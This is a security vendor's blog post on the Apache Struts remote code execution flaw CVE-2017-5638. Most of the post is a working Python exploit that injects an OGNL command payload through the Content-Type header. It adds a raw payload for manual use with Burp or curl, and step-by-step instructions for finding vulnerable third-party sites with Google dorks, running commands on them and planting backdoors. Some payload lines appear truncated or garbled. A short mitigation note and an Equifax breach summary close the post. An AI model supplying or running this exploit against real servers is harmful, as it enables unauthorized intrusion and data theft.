Briskinfosec - Global Cybersecurity Service Providers

  • +91 86086 34123

  • contact@briskinfosec.com

Stay Connected:

Command Execution Attacks on Apache Struts server CVE-2017-5638 | Briskinfosec
Image

Command Execution Attacks on Apache Struts server CVE-2017-5638

What are Apache Struts?

Apache Struts is a free, open-source, MVC framework for creating elegant and modern Java web applications. It favours convention over configuration and is extensible using a plugin for supporting REST, AJAX, and JSON.

What is CVE 2017-5638 Vulnerability?

CVE 2017-5638 is a remote code execution bug that affects the Jakarta Multipart parser in Apache Struts. The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 mishandles file upload, which allows remote attackers to execute arbitrary commands via a #cmd= string in a crafted Content-Type HTTP header.

Public Exploit code for Exploiting CVE 2017-5638 (Source: Github)

 

#!/usr/bin/python

# -*- coding: utf-8 -*-

 import urllib2

import httplib

 def exploit(url, cmd):

    payload = "%{(#_='multipart/form-data')."

    payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."

    payload += "(#_memberAccess?"

    payload += "(#_memberAccess=#dm):"

payload += "((#c>

payload+="(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."

    payload += "(#ognlUtil.getExcludedPackageNames().clear())."

    payload += "(#ognlUtil.getExcludedClasses().clear())."

    payload += "(#context.setMemberAccess(#dm))))."

    payload += "(#cmd='%s')." % cmd

payload+="(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."

    payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."

    payload += "(#p=new java.lang.ProcessBuilder(#cmds))."

    payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."

payload+="(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."

    payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."

    payload += "(#ros.flush())}"

     try:

        headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}

        request = urllib2.Request(url, headers=headers)

        page = urllib2.urlopen(request).read()

    except httplib.IncompleteRead, e:

        page = e.partial

     print(page)

    return page

 if __name__ == '__main__':

    import sys

    if len(sys.argv) != 3:

        print("[*] struts2_S2-045.py ")

    else:

        print('[*] CVE: 2017-5638 - Apache Struts2 S2-045')

        url = sys.argv[1]

        cmd = sys.argv[2]

        print("[*] cmd: %s\n" % cmd)

        exploit(url, cmd)

How to Exploit CVE 2017-5638 using above exploit:(Exploit Process)

  • First, we will find a web application vulnerable to apache struts code execution (CVE 2017-5638) by using google dorks.

  • Once we got the dork search results, we will check if the site is vulnerable or not by using the above exploit.
  • Copy the above exploit code and save it as any name.py. Here I’m using as struts.py. Then give exploit file permission using the command ‘chmod +x 777

  • We will use the above exploit to run system commands on vulnerable application’s server. To confirm the vulnerability we will use exploit to run ‘id’ command in a remote server. Syntax for the exploit is struts.py

  • As we can see from the above image, the remote server is vulnerable to code execution due to the vulnerable apache struts jakarta parser plugin in “login. Action” page.

After confirming the vulnerability, an attacker or tester can run any operating system commands on the remote server based on the privileges of the remote apache tomcat server. In above image we can see that I’m getting uid=1001 which means that I don’t have root privileges to run privileged commands on remote server.

 

  • An attacker or tester can check for any privilege escalation vulnerabilities in remote server to get root privileges in some cases
  • Let’s run some system commands

Above command ‘ls’ gives the list of files in the server directory. In this way an attacker can take control of the server and create persistence connection to the remote server by setting up backdoor in the server. 

Other Exploit Sources

Popular exploit framework metasploit has released exploit code for this vulnerability in its metasploit framework exploit modules. We can access that through msfconsole in kali linux or other linux distros.

Manual Exploitation of Vulnerability: (Without Exploit code)

For exploiting this vulnerability manually, we can use intercepting proxies like burp suite or utilities like curl which is available in Linux.

Raw payload for exploitation:

%{(#_=’multipart/form-data’).(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#c java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

  • If we use Burp suite, we can intercept the request of vulnerable application and add the above payload to the Content-Type header of request. In response we will get the result of our command.
  • In the above payload, we need to change the #cmd parameter to the command of our choice to run on remote server. For example #cmd=ls or #cmd=id.
  • Since we are using ‘curl’ tool for this example we need to give command as “curl url H Content-type: ”

  • In this way, we can manually exploit this vulnerability manually.

Mitigation against CVE 2017-5638

Upgrade apache struts to the latest versions like 2.3.32 and 2.5.10.1 to avoid this kind of vulnerably.

Real-world Data Breaches due to CVE 2017-5638

Equifax Inc. is a consumer credit reporting agency. Equifax collects and aggregates information on over 800 million individual consumers and more than 88 million businesses worldwide.

Equifax, the third largest credit reporting firm in the United States, admitted that it had suffered a massive data breach somewhere between mid-May and July this year, got discovered only on July 29, thus indicating the data exposure of 143 million people over 3 months.

Over 3 months. This data breach is due to the fact that, the company failed to patch this apache struts vulnerability in jakarta parser (CVE 2017-5638). (Source – thehackernews.com).

References

https://www.rapid7.com/db/vulnerabilities/apache-struts-cve-2017-5638

http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html

http://thehackernews.com/2017/09/equifax-apache-struts.html

https://blog.blackducksoftware.com/cve-2017-5638-anatomy-apache-struts-vulnerability

In today’s threat landscape, a lot of attention is paid to endpoint systems being compromised, and with good reason, as it accounts for the majority of the malicious activity we observe on a daily basis. BriskInfosec adds the ability to easily block this vulnerability by providing the web application and server vulnerability test.

Comments

Add Your Comments

Name*
Email*
Your Comments*